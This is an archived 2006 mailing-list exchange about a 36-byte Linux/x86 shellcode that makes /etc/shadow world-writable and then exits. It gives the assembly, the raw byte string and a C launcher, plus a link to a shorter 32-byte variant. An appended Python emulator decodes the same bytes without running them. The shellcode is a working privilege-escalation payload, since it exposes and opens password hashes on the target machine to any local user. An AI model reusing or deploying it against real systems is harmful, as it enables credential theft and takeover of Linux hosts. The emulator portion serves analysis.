[Code-Crunchers] 36 byte shellcode to chmod("/etc/shadow", 0666) and exit for Linux/x86
Izik
xorninja at gmail.com
Sat Nov 18 09:54:48 CST 2006
Been there, done that.
http://www.tty64.org/code/shellcodes/linux-x86-src/chmod-shadow.s
32 bytes.
On 11/17/06, Kris Katterjohn <kjak at ispwest.com> wrote:
>
> This shellcode does a chmod("/etc/shadow", 0666) and exits in 36 bytes
> on Linux/x86.
>
> Also at http://packetstormsecurity.nl/shellcode/chmodshadow.c
>
> Hey Mike, this is an example from when I didn't use the double-slash and
> did two separate PUSHes (ugly!). An extra byte can be removed from this
> by using the double-slash. I quickly discovered this after it was on PSS
>
> -Kris
>
>
> /* By Kris Katterjohn 8/29/2006
> *
> * 36 byte shellcode to chmod("/etc/shadow", 0666) and exit for Linux/x86
> *
> * To remove exit(): Remove the last 5 bytes (0x6a - 0x80)
> *
> *
> *
> * section .text
> *
> * global _start
> *
> * _start:
> * xor edx, edx
> *
> * push byte 15
> * pop eax
> * push edx
> * push byte 0x77
> * push word 0x6f64
> * push 0x6168732f
> * push 0x6374652f
> * mov ebx, esp
> * push word 0666Q
> * pop ecx
> * int 0x80
> *
> * push byte 1
> * pop eax
> * int 0x80
> */
>
> int main(void)
> {
>     char shellcode[] =
>         "\x31\xd2\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\x68"
>         "\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\x68"
>         "\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80";
>
>     (*(void (*)()) shellcode)();
> }
>
>
>
> _______________________________________________
> Code-Crunchers mailing list
> Code-Crunchers at whitestar.linuxbox.org
> http://whitestar.linuxbox.org/mailman/listinfo/code-crunchers
>
>
>
--
Thank you, your honor. With God's help I'll conquer this terrible
affliction.
-- Mark 'Rentboy' Renton / Trainspotting
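For readers who want to check the quoted post's claims (36 bytes, the string built from PUSHes, the `push word 0666Q` / `pop ecx` trick, and "remove the last 5 bytes to drop exit()") without running the bytes, here is an added example that is not from either poster: a tiny Python emulator for just the opcodes this sample uses, which replays the pushes on a private stack and reports each `int 0x80` as a named syscall. The shellcode bytes are copied from the post; the 64-byte stack, register names and the `umode_t` masking are the example's own modelling.

```python
import struct

# Bytes copied from Kris's post (36 bytes); the decoder around them is an added example.
SHELLCODE = (
    b"\x31\xd2\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\x68"
    b"\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\x68"
    b"\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80"
)

def emulate(code: bytes) -> list:
    """Replay the shellcode and return each int 0x80 as a (name, args...) tuple.
    Only the opcodes this sample uses are handled; anything else raises."""
    reg = {"eax": 0, "ebx": 0, "ecx": 0, "edx": 0}
    mem = bytearray(64)        # a tiny private stack; esp is an index into it
    esp = len(mem)
    calls, i = [], 0

    def push(data: bytes):
        nonlocal esp
        esp -= len(data); mem[esp:esp + len(data)] = data

    def pop32() -> int:
        nonlocal esp
        val = struct.unpack_from("<I", mem, esp)[0]; esp += 4; return val

    while i < len(code):
        op, pair = code[i], code[i:i + 2]
        if pair == b"\x31\xd2":                        # xor edx, edx  (NUL terminator source)
            reg["edx"], i = 0, i + 2
        elif op == 0x6a:                               # push imm8, sign-extended to 32 bits
            push(struct.pack("<i", struct.unpack("<b", code[i + 1:i + 2])[0])); i += 2
        elif op == 0x68:                               # push imm32 (4 string bytes at a time)
            push(code[i + 1:i + 5]); i += 5
        elif pair == b"\x66\x68":                      # push imm16 (66h operand-size override)
            push(code[i + 2:i + 4]); i += 4
        elif op == 0x52:                               # push edx
            push(struct.pack("<I", reg["edx"])); i += 1
        elif op in (0x58, 0x59):                       # pop eax / pop ecx
            reg["eax" if op == 0x58 else "ecx"] = pop32(); i += 1
        elif pair == b"\x89\xe3":                      # mov ebx, esp  (ebx -> start of pushed string)
            reg["ebx"], i = esp, i + 2
        elif pair == b"\xcd\x80":                      # int 0x80
            if reg["eax"] == 15:                       # __NR_chmod(path=ebx, mode=ecx)
                path = bytes(mem[reg["ebx"]:]).split(b"\0")[0].decode()
                # 'pop ecx' after a 2-byte push drags in 2 stale stack bytes; the kernel's
                # 16-bit umode_t (masked to the permission bits) discards them.
                calls.append(("chmod", path, reg["ecx"] & 0xFFFF))
            elif reg["eax"] == 1:                      # __NR_exit (status = whatever ebx holds)
                calls.append(("exit",))
            else:
                raise ValueError(f"unexpected syscall number {reg['eax']}")
            i += 2
        else:
            raise ValueError(f"unhandled opcode {pair.hex()} at offset {i}")
    return calls
```

`emulate(SHELLCODE)` yields `chmod("/etc/shadow", 0o666)` followed by `exit`, and `emulate(SHELLCODE[:-5])` yields the chmod alone, confirming the post's note about the trailing 5 bytes.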